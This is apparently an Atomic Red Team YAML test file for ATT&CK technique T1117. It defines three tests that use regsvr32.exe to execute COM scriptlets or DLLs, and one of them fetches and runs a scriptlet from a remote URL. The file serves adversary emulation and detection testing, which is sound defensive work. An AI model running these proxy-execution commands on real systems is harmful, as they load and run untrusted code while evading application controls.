Brian Beyer
46 lines
1.3 KiB
YAML
46 lines
1.3 KiB
YAML
attack_technique: T1117
|
|
display_name: Regsvr32
|
|
atomic_tests:
|
|
- name: Regsvr32 local COM scriptlet execution
|
|
description: |
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
filename:
|
|
description: Name of the local file, include path.
|
|
type: Path
|
|
default: Regsvr32.sct
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
regsvr32.exe /s /u /i:#{filename} scrobj.dll
|
|
- name: Regsvr32 remote COM scriptlet execution
|
|
description: |
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
url:
|
|
description: URL to hosted sct file
|
|
type: Url
|
|
default: http://www.example.com/file.sct
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
regsvr32.exe /s /u /i:#{url} scrobj.dll
|
|
- name: Regsvr32 local DLL execution
|
|
description: |
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
dll_name:
|
|
description: Name of DLL to Execute, DLL Should export DllRegisterServer
|
|
type: Path
|
|
default: payload.dll
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
regsvr32.exe #{dll_name}
|